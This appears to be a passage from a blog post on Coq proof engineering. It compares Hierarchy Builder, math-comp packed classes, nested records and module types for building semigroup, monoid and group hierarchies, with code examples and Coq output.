HB.mixin Record IsComMonoid A of Monoid A := {
addrC : forall (x y : A), x + y = y + x;
}.
HB.structure Definition ComMonoid := { A of IsComMonoid A }.
(* Group definition, inheriting from Monoid *)
HB.mixin Record IsGroup A of Monoid A := {
opp : A -> A;
addNr : forall x, opp x + x = 0;
}.
HB.structure Definition Group := { A of IsGroup A }.
Notation "- x" := (opp x).
Now for the interesting part. Hierarchy Builder makes it easy for us to do multiple inheritance and combine the constraints, much like typeclasses. We can then seamlessly prove the lemma exactly as we did before.
(* Abelian group definition, inheriting from Group and ComMonoid *)
HB.structure Definition AbGroup := { A of IsGroup A & IsComMonoid A }.
(* Lemma that holds for Abelian groups *)
Lemma example (G : AbGroup.type) (a b : G) : -b + (b + a) + -a = 0.
Proof. by rewrite addrC (addrA (opp b)) addNr add0r addNr. Qed.
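HB structures are instantiated through the generated Build functions via the HB.instance command. As a hypothetical sketch (untested; the lemma names are mine), here is bool with xorb and identity false:

```coq
(* Assumes the mixins and structures above are in scope. *)
Lemma xorbA : forall x y z : bool, xorb x (xorb y z) = xorb (xorb x y) z.
Proof. by move=> [] [] []. Qed.
Lemma xorFb : forall x : bool, xorb false x = x. Proof. by case. Qed.
Lemma xorbF : forall x : bool, xorb x false = x. Proof. by case. Qed.

HB.instance Definition _ := IsSemigroup.Build bool xorb xorbA.
HB.instance Definition _ := IsMonoid.Build bool false xorFb xorbF.
```

After these declarations, bool is recognized as a Monoid.type, and the 0 and + notations resolve to false and xorb on it.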
The underlying code it generates follows a pattern known as packed classes (elaborated in the next section). As a form of future-proofing, the generated code can be shown by prefixing an HB command with #[log]. When the HB.structure command is invoked, a number of mixins and definitions are created. For brevity I've omitted some of them here.
...
Top_AbGroup__to__Top_Semigroup is defined
Top_AbGroup__to__Top_Monoid is defined
Top_AbGroup__to__Top_Group is defined
Top_AbGroup__to__Top_ComMonoid is defined
join_Top_AbGroup_between_Top_ComMonoid_and_Top_Group is defined
...
In more detail, here is the output of Print Top_AbGroup__to__Top_ComMonoid, which shows that it is a coercion letting us go from an Abelian group structure to a commutative monoid structure (i.e. going back up the hierarchy). Hierarchy Builder automatically creates these coercions and joins for us.
Top_AbGroup__to__Top_ComMonoid =
fun s : AbGroup.type =>
{| ComMonoid.sort := s; ComMonoid.class := AbGroup.class s |}
: AbGroup.type -> ComMonoid.type
Top_AbGroup__to__Top_ComMonoid is a coercion
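Because of these coercions, lemmas stated at one level of the hierarchy apply transparently at the levels below it. For example (assuming the definitions above are in scope; the lemma name is mine), addrC, a commutative monoid law, can be used directly on an Abelian group:

```coq
Lemma reuse (G : AbGroup.type) (x y : G) : x + y = y + x.
Proof. by rewrite addrC. Qed.
```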
It is worth noting that the math-comp library is undergoing a transition to Hierarchy Builder, away from hand-written instances and coercions.
Reading: Canonical structures for the working Coq user
In the math-comp library, the approach taken is known as the packed classes design pattern. It's a fairly complicated construct that I might elaborate on more in a future blog post, but I'll give some highlights and a full example.
Note that math-comp is being ported to Hierarchy Builder, so this style is being phased out.
According to the Mathematical Components book,
Telescopes suffice for most simple — tree-like and shallow — hierarchies, so new users do not necessarily need expertise with the more sophisticated packed class organization covered in the next section
Here's how to define a monoid. We create a module, postulate a type T and an identity element zero of type T, and combine the laws into a record called law. The exports section is small here; we export just the operator coercion.
From Coq Require Import ssreflect ssrfun.
Set Implicit Arguments.

Module Monoid.
Section Definitions.
Variables (T : Type) (zero : T).
Structure law := Law {
operator : T -> T -> T;
_ : associative operator;
_ : left_id zero operator;
_ : right_id zero operator
}.
Local Coercion operator : law >-> Funclass.
End Definitions.
Module Import Exports.
Coercion operator : law >-> Funclass.
End Exports.
End Monoid.
Export Monoid.Exports.
With that defined, we can instantiate the monoid structure for booleans (note that zero is automatically unified with true).
Import Monoid.
Lemma andbA : associative andb. Proof. by case. Qed.
Lemma andTb : left_id true andb. Proof. by case. Qed.
Lemma andbT : right_id true andb. Proof. by case. Qed.
Canonical andb_monoid := Law andbA andTb andbT.
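Two quick checks (hypothetical, assuming the code above compiles) show the machinery at work: the exported coercion lets a law be applied as a function, and unifying operator ?m with andb makes Coq fill in the canonical andb_monoid:

```coq
Check (andb_monoid true false).                  (* the law coerces to its operator *)
Check (erefl andb : Monoid.operator _ = andb).   (* canonical structure inference *)
```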
Let's define a semigroup using one of the most basic features of Coq: records. Written this way, a structure is just a conjunction of laws, an n-ary predicate over n components. We define the semigroup structure first, then treat monoids as augmented semigroups.
Require Import ssrfun.
Record Semigroup {A : Type} : Type := makeSemigroup {
s_add : A -> A -> A;
s_addrA : associative s_add;
}.
Record Monoid {A : Type} : Type := makeMonoid {
m_semi : @Semigroup A;
m_zero : A;
m_add0r : forall x, (s_add m_semi) m_zero x = x;
m_addr0 : forall x, (s_add m_semi) x m_zero = x;
}.
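To make the verbosity concrete, here is a hypothetical instantiation over nat (the names are mine; Nat.add_assoc and friends come from the standard library):

```coq
Require Import Arith.

Definition nat_semigroup : @Semigroup nat :=
  makeSemigroup Nat.add Nat.add_assoc.

Definition nat_monoid : @Monoid nat :=
  makeMonoid nat_semigroup 0 Nat.add_0_l Nat.add_0_r.

(* Even at this level, reaching the operation requires a projection chain: *)
Check (s_add (m_semi nat_monoid)).
```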
Unfortunately, we already have to make an awkward choice: projecting through the nested record to access the underlying shared binary operation. At the next level, when one defines groups as an augmented monoid, the situation only gets worse:
Record Group {A : Type} : Type := makeGroup {
m_monoid : @Monoid A;
g_inv : A -> A;
g_addNr : forall x, (s_add (m_semi m_monoid)) (g_inv x) x = m_zero m_monoid;
}.
We have to access the operation through two layers of projections! We might be tempted to add a member to the record that is equal to the inherited operation, but this too is unsatisfactory, since it prevents us from having a single canonical name for the operation in question (for instance, add), and we'd have to do this at arbitrarily nested levels. Thus, while flexible, this approach does not scale.
One approach, seen in CPDT, is to use the module system to organize the hierarchy. It seems fine for the first few structures: we declare module types and postulate additional axioms on top of the structure from which we inherit.
Require Import ssrfun.
Module Type SEMIGROUP.
Parameter A: Type.
Parameter Inline add: A -> A -> A.
Axiom addrA : associative add.
End SEMIGROUP.
Module Type MONOID.
Include SEMIGROUP.
Parameter zero : A.
Axiom add0r : left_id zero add.
End MONOID.
Module Type COM_MONOID.
Include MONOID.
Axiom addrC : commutative add.
End COM_MONOID.
Module Type GROUP.
Include MONOID.
Parameter opp : A -> A.
Axiom addNr : forall x, add (opp x) x = zero.
End GROUP.
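Implementing one of these signatures is straightforward; here is a hypothetical sketch (untested) over nat:

```coq
Require Import Arith.

Module NatMonoid <: MONOID.
  Definition A := nat.
  Definition add := Nat.add.
  Lemma addrA : associative add.
  Proof. exact Nat.add_assoc. Qed.
  Definition zero := 0.
  Lemma add0r : left_id zero add.
  Proof. exact Nat.add_0_l. Qed.
End NatMonoid.
```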
However, we immediately run into an issue when trying to create an Abelian group from a commutative monoid and a group: the carrier type A is already in scope from the first Include, so we cannot share the carrier type (or even the underlying monoid) with GROUP. So we give up.
Module Type COM_GROUP.
Include COM_MONOID.
Fail Include GROUP.
End COM_GROUP.
The command has indeed failed with message:
The label A is already declared.
Just as in software engineering, there are many ways to organize mathematical theories in proof assistants such as Coq.
Personally, I would lean more towards organizing my theories with Hierarchy Builder—or at the very least, typeclasses, if external dependencies are an issue.